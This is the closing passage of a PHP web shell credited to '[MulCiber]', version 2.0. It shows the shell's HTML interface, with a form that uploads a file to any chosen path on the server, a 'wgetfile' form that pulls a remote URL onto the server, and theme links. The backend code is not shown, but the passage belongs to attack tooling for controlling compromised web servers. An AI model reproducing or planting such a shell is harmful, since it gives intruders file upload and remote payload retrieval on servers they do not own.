<tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save location: <input type='text' style='width: 300px' value='$relpath' name='u_location'></br><input type='file' name='u_file'><input type='submit' value='Upload' name='doUpload'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'><input type='submit' name='dogetfile' value='Go'></form</td></tr>
<tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self?theme=dark'>Dark</a></td></tr>
</table>
</br></br><div id='bar'><center>Shell [version 2.0] created by <font color='red'><b>[MulCiber]</font> | Page generated in : <font color='red'>".round(microtime()-$start,2)." seconds</font></center></div></body></html>";
ob_end_flush();
?>